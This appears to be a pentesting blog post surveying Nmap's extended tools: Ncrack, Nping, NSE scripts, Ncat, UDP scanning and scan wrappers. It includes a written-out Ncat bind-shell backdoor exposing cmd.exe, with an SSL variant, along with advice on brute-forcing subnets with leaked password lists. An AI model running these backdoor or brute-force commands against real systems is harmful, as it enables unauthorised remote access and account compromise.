Advanced Nmap

Some of the guys I hack with and I have been talking about the “core” toolset in pentesting… like what could you absolutely not go in without? What we came up with is:
  • nmap
  • metasploit
  • ettercap
  • burp
  • Wireshark

There are tons of tools that came close to that bracket, other proxies, scanners, other MiTM tools, but these tools have a special place in our hearts. These tools have encompassed so many pentesting needs that it’s hard to find something this combo can’t do. This is also clearly for external and internal pentests, that do NOT include social, OSINT, and other type of tests.
Tonight I wanted to share some Nmap stuff that I’ve been using lately or am getting ready to start using.
It’s hard to go over Nmap in one writeup for a few reasons. One is it’s default purpose (scanning) is a topic in an of itself. Correct timing, parallelism, scan types, IDS evasion, internal scans, external scans, etc. These could all have posts of thier own, all with heated debate about the validity of each.
The second reason is Nmap is no longer a scanner. Not that anyone who reads this blog wouldn’t know that but, nmap has grown into a beast of some sorts. Nmap has effectively extended itself to replace Medusa (with Ncrack), Hping (with Nping), Nessus/OpenVAS (with Nmap Scripting Engine), Netcat (with Ncat), UnicornScanner/UDPProtoScanner (New Nmap UDP scanning), as well as has a host of bolted on scripts that extend Nmap beyond just a normal users use case. Today we’ll just go through a few cool things, as you can find a lot about general nmap scanning techniques from the below books:


Ncrack is a command line password bruteforcer like hydra and medusa. Up until recently I was a stalwart Medusa user but what brought me over (mostly) was the superior SSH library, RDP password bruting, and easy nmap-like syntax. Should you want to audit a whole class C for ssh passwords Ncrack makes this easy:
1ncrack -p 22
Ncrack supports the following protocols:
  • FTP
  • TElNET
  • SSH
  • RDP
  • HTTP(S)
  • SMB
  • POP3(s)

Comparing this to Medusa it seems like a lot less to offer, Medusa does SQL bruteforcers,  R-service bruteforcers, VNC, VMWare Authd, SNMP, etc, but in most cases I use Ncrack with Medusa as a backup. The rest of those protocols I can mostly get through Metasploit which is one less layer of abstraction. In some cases Ncrack can be less stable, in these cases rely on ole medusa to CYA. We recommended using password lists from SkullSecurity, Ron has made an extensive list of popular site breaches and their associated leaked passwords for pentesters to use with bruteforcing tools.


Nping is another summer of code project designed (presumably) to take over Hping duties. Since there is a plethora of Hping versions to carry around i find it refreshing to have an updated tool for packet manipulation. In general Hping’s utility is to generate custom packets. Using hping is way easier than implementing custom packets in a scripting language like python. A major drawback to Hping was its lack of inherent “scanner” type functionality, meaning that unless you created a bash wrapper or TCL script it was a one target type of tool. Nping fixes this in stellar fashion by supporting Nmap syntax. Although Nmap has done it’s best to implement the type of scanning one would do with Hping/Nping nothing beats having a command line tool to send custom packets. Custom packets being a very ambiguous term, Hping has traditionally been used to test firewalls, evade IDS, send POC/DoS packets, etc. Many have moved over to Scapy as it offers a bit more in the way of  customization but Nping is a welcome addition to packet crafting tools.

NSE (Nmap Scripting Engine)

The Nmap Scripting Engine is a lua framework to do pretty much anything within nmap, with the power of nmap. If you think about it, it was a natural progression. Nmap was already doing service version fingerprinting and banner checking… isn’t that what bigtime vulnerability scanners do? Vulnscanner = PortScanner + Service Version Checking ( using banner reading, TCP/IP response timing, and other socket response type regexing/signatures) + vulnerability correlation. I mean, theres a bit more to it, but not much. You can see that in that list theres not much that nmap didn’t already do. Plus adding a simple scripting language that anyone can write to the powerful underlying NSE makes for empowered testers. Some bigtime firms I know have taken vuln scanners out of the rotation in their pentests opting for specific targeted NSE scripts.  In addition NSE offers a lot to both netpen and webpen. A plethora of scripts are webpen based. There are a modest 194 scripts in SVN but I know that not everyone is releasing thier scripts, which imo hurts the projects awesomeness. Lame pentesters are lame. Here are some of our favs:
  • banner - A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds. We’ve used this to scan large domains with services not in the nmap fingerprints database and pipe the output to files for later inspection.
  • dns-cache-snoop - Performs DNS cache snooping against a DNS server. Replaces easy bash scripting, but nice.
  • hostmap - Tries to find hostnames that resolve to the target’s IP address by querying the online database at Replaces Hostmap which is intermittently broken =(
  • http-brute - Performs brute force password auditing against http basic authentication. Saves some time setting up Burp to do this.
  • http-enumEnumerates directories used by popular web applications and servers. WIN. We have ported many fingerprints we see often into http-enum’s fingerprint database (in fact we are credited in that source). Dirbuster and wfuzz are great and focus on  large sets of common words for directory bruteforcing, we use http-enum for more targeted framework bruteforcing… and it works.
  • smb-enum-shares - Attempts to list shares using the srvsvc.NetShareEnumAll MSRPC function and retrieve more information about them using srvsvc.NetShareGetInfo. If access to those functions is denied, a list of common share names are checked.
  • smb-brute - Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. SMB is the weakest link… goodbye.
  • smb-check-vulns - Checks for vulnerabilities: MS08-067, etc, etc.
  • smb-psexec - This script implements remote process execution similar to the Sysinternals’ psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool on a range of system, or even installing a backdoor on a collection of computers.
  • As well as the more targeted SNMP, MSSQL,  MYSQL, ORACLE, and Lotus enumeration and bruteforce scripts.

In addition, Andre Gironda (@atdre) pointed us to NSE Vulscanner this week which correlates services banners to OSVDB vulns… which is… WICKED. In this thread you can see that, yes, there are some logistical problems with vulns not being verified/false positives but, this NSE script is a powerful tool in addition to your blanket portscans. Think of how Armitage and DBAutopwn work in Metasploit. Portscan -> Vuln correlation per port. Well now you are not only leveraging the Metasploit database, but the WHOLE OSVDB at no cost to you. As service level detection becomes available for this, well, you can imagine a lot of vuln scan companies running scared. A Sample run looks like so:
01nmap -PN -sS -sV --script=vulscan -p25
0425/tcp open  smtp    syn-ack Exim smtpd 4.69
05| vulscan: [5330] Exim Configuration File Variable Overflow
06| [5896] Exim sender_verify Function Remote Overflow
07| [5897] Exim header_syntax Function Remote Overflow
08| [5930] Exim Parenthesis File Name Filter Bypass
09| [12726] Exim -be Command Line Option host_aton Function Local Overflow
10| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
11| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
    Also, Nmap NSE and Metasploit have bridged a bit through new functions implemented in Metasploit, check that out. Lastly, Ron also has an experimental pwdump like Nmap script that will dump password hashes and get them ready for rainbow tables … effing eh…
So, NSE… get on it. Here are some links to get you hyped:

PS – I like to search for cool non-trunk scripts like this in google:  ”nse script nmap”  and to the left sort results by last 6 months (i do this for a lot of hacking tools actually)


Ncat is Nmap’s answer to Netcat. It pretty much does everything netcat can do plus implements IPV6, UDP,  and SSL socket connections… no more stunnel! It also has hex output options, SOCKS4 + HTTP Proxying,  and built in access control. Irongeek has a video basically showing all the flag actions in practice, you can find that here. Ncat also comes with a nifty exec feature, here we are ssl wrapping our backdoor:
Backdoor ncat:
1C:\Windows\System32> ncat -l --exec "cmd.exe" 1337
01root@bt:~# ncat 1337
02Microsoft Windows [Version 6.1.7600]
03Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
07 Volume in drive C has no label.
08 Volume Serial Number is 00E1-F423
10 Directory of c:\Windows\System32
1204/15/2011  03:20 AM              .
1304/15/2011  03:20 AM              ..
1407/13/2009  10:37 PM              0409
1509/27/2010  10:33 AM              1033
Traffic Inspection of backdoor before SSL:
SSL backdoor:
1C:\Windows\System32> ncat -l --ssl --exec "cmd.exe" 1337
1root@bt:~# ncat --ssl 1337
Traffic Inspection of “dir” command using backdoor after SSL:

Nmap UDP Payload Scanning

The issue facing accurate scanning of UDP ports is the nature of UDP programs themselves. Delivering anything other than a legitimate UDP Payload to a service usually results in a dropped packet. This is bad news for pentesters, as we want a full and accurate scan of our targets. UDP Payload scanning is the solution (most of the time). Instead of scanning with an empty UDP packet, we send it a legitimate payload that works with the service we are scanning. If we receive a response it indicates an open port. Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace Jack), or udp-proto-scanner by Portcullis Labs. Although these tools are often stellar, sometimes they are buggy and lack the Nmap type features we want in a port scanner.
Newer versions of Nmap fix that dilemma by adding the following UDP fingerprints for scanning:
01udp/7 echo
02udp/53 domain
03udp/111 rpcbind
04udp/123 ntp
05udp/137 netbios-ns
06udp/161 SNMP
07udp/177 xdmcp
08udp/500 ISAKMP
09udp/520 route
10udp/1645 RADIUS
11udp/1812 RADIUS
12udp/2049 NFS
13udp/5353 zeroconf
14udp/10080 amanda

Auxiliary Nmap Scripts

There are several scripts for manipulating output and extending Nmap.
    fastNmap and npwn - Perl scripts for maximizing scanning large networks by cutting up your scans into small tasks and analyzing large scan data in better fashion. I'm excited to use this on a cloud provider soon for some fast and furious /16 script scanning. Research project presentations (pdf's) here and here fastnmap and npwn code here. Smap - Recently an interesting one I have played with is smap a nmap wrapper that will take namp output and run hosts through Niagos service checks as well. The author claims the checks are more accurate than Nmap. Either way, I tested the wrapper against some local lab machines and it identified more HTTP servers and and versions for non-standard ports than nmap did, and more accurately. Smap discussion here and download here.
Sample output:
01root@bt:~/smap/scan_data/2011-04-26_16.15.29# cat report-hosts.log
02Scan_results generated for 2011-04-26_16.15.29
04--[ HOST - List ]--------
07IP                        :: Port   :: Service              -> Server_Type
09192.168.1.2               :: 10243  :: http                 -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP). Ignored State: closed (12325)
10192.168.1.2               :: 8834   :: http                 -> NessusWWW
11192.168.1.2               :: 5357   :: http                 -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP).
12192.168.1.2               :: 3389   :: microsoft-rdp        -> Microsoft Terminal Service.
13192.168.1.2               :: 3306   :: mysql                -> MySQL (unauthorized).
14192.168.1.2               :: 2869   :: icslap?              -> .
15192.168.1.2               :: 1241   :: ssl.nessus           -> Nessus Daemon (NTP v1.2).
16192.168.1.2               :: 1036   :: nsstp?               -> .
17192.168.1.2               :: 1035   :: multidropper?        -> .
18192.168.1.2               :: 1027   :: msrpc                -> Microsoft Windows RPC.
19192.168.1.2               :: 1026   :: LSA-or-nterm?        -> .
20192.168.1.2               :: 1025   :: msrpc                -> Microsoft Windows RPC.
21192.168.1.2               :: 990    :: ftps?                -> .
22192.168.1.2               :: 912    :: vmware-auth          -> VMware Authentication Daemon 1.0 (Uses VNC
23192.168.1.2               :: 554    :: rtsp?                -> .
24192.168.1.2               :: 445    :: netbios-ssn          -> .
25192.168.1.2               :: 443    :: ssl.http             -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.
27192.168.1.2               :: 139    :: netbios-ssn          -> .
28192.168.1.2               :: 135    :: msrpc                -> Microsoft Windows RPC.
29192.168.1.2               :: 80     :: http                 -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.
    Rainmap - Rainmap was a Summer of Code project to distribute nmap scanning among cloud servers and consolidate command and control through a single web gui. The project was completed but is slated for a rewrite this SoC. For me, it looks like it has too many moving parts and needs some more development but it is out there.Nmap to SQL - Nmap lacks sql output for some reason. A buddy of mine asked fyodor why its not there by default and fyodor told him to go read the Nmap book. He instead wrote his own parser, with more output than most of the comparative ones out there. Here. Nsploit - a XMLRPC bridge from nmap to metasploit (yes we know armitage is cool, we prefer non GUI apps). Learn more here Here. Droidmap - nmap for droid, still in dev. Here.

Happy hacking!

Category Article

2 Responses to “c0decstuff”

What's on Your Mind...

Thank f' u C0mment